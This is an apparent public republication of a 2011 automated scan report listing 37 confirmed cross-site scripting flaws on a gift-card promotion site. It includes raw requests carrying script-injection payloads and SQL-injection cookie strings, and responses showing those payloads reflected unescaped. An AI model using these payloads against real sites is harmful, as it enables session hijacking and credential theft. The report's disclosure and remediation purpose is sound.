Stored XSS, Reflected Cross Site Scripting in your-gift-zone.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Private Reporting of Security Research is preferred for Online Service Providers

Loading

Netsparker - Scan Report Summary
TARGET URL
http://your-gift-zone.com/ups.htm?user_pin_id...
SCAN DATE
4/27/2011 9:53:22 AM
REPORT DATE
4/27/2011 10:26:03 AM
SCAN DURATION
00:31:20

Total Requests

Average Speed

req/sec.
50
identified
39
confirmed
0
critical
1
informational

GHDB DORK Tests

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

GHDB, DORK VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
76 %
MEDIUM
18 %
LOW
4 %
INFORMATION
2 %

GHDB, DORK VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ PHP Version Disclosure No
/info.htm promo_name GET Cross-site Scripting Yes
gift GET Cross-site Scripting Yes
promo_name GET Cross-site Scripting Yes
promo_name GET HTTP Header Injection No
gift GET HTTP Header Injection No
promo_name GET HTTP Header Injection No
gift GET HTTP Header Injection No
Cookie Not Marked As HttpOnly Yes
E-mail Address Disclosure No
/ups.htm user_pin_id GET Cross-site Scripting Yes
pin_key GET Cross-site Scripting Yes
user_ref_id GET Cross-site Scripting Yes
gift GET Cross-site Scripting Yes
user_gift_id GET Cross-site Scripting Yes
path GET Cross-site Scripting Yes
promotion_id GET Cross-site Scripting Yes
promo_name GET Cross-site Scripting Yes
catalog_id GET Cross-site Scripting Yes
tmp_sequence GET Cross-site Scripting Yes
ups_ref GET Cross-site Scripting Yes
sendroikwd GET Cross-site Scripting Yes
remoteRef GET Cross-site Scripting Yes
return_url GET Cross-site Scripting Yes
short_ic_path GET Cross-site Scripting Yes
SID GET Cross-site Scripting Yes
page_list GET Cross-site Scripting Yes
path GET Cross-site Scripting Yes
user_pin_id GET Cross-site Scripting Yes
pin_key GET Cross-site Scripting Yes
user_ref_id GET Cross-site Scripting Yes
gift GET Cross-site Scripting Yes
user_gift_id GET Cross-site Scripting Yes
promotion_id GET Cross-site Scripting Yes
promo_name GET Cross-site Scripting Yes
catalog_id GET Cross-site Scripting Yes
ups_ref GET Cross-site Scripting Yes
remoteRef GET Cross-site Scripting Yes
sendroikwd GET Cross-site Scripting Yes
return_url GET Cross-site Scripting Yes
tmp_sequence GET Cross-site Scripting Yes
page_list GET Cross-site Scripting Yes
short_ic_path GET Cross-site Scripting Yes
SID GET Cross-site Scripting Yes
Permanent Cross-site Scripting Yes
promo_name GET HTTP Header Injection No
promo_name GET HTTP Header Injection No
user_pin_id GET HTTP Header Injection No
pin_key GET HTTP Header Injection No
promo_name GET HTTP Header Injection No
Cross-site Scripting

Cross-site Scripting

37 TOTAL
IMPORTANT
CONFIRMED
37
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=%22%3E%3Cscript%3Ealert(9)%3C/script%3E&pin_key=706853..

Parameters

Parameter Type Value
user_pin_id GET "><script>alert(9)</script>
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916146; scook=1303916146; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:55:47 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e7341462563;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id="><script>netsparker(9)</script>&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $50 Gift Card.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle"> $50 Gift Card</span> <br />
<span style="margin-left: 30px;"><img src="http://www.theuseful.com/media/freegiftcard_reserved_287x180.gif" width="200" height="126"></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $50 Gift Card, start by completing any 6 of the offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 6 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int&user_pin_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" target="_blank" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key='%22--%3E%3C/style%3E%3C/script%3E%3..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET '"--></style></script><script>alert(0x00002F)</script>
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002F)%3C/script%3E&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916149; scook=1303916149; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:55:49 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e75c2488gam;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key='"--></style></script><script>netsparker(0x00002F)</script>&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00002F)</script>&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x00002F)</script>&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=%22%3E%3Cscript%3..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET "><script>alert(9)</script>
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
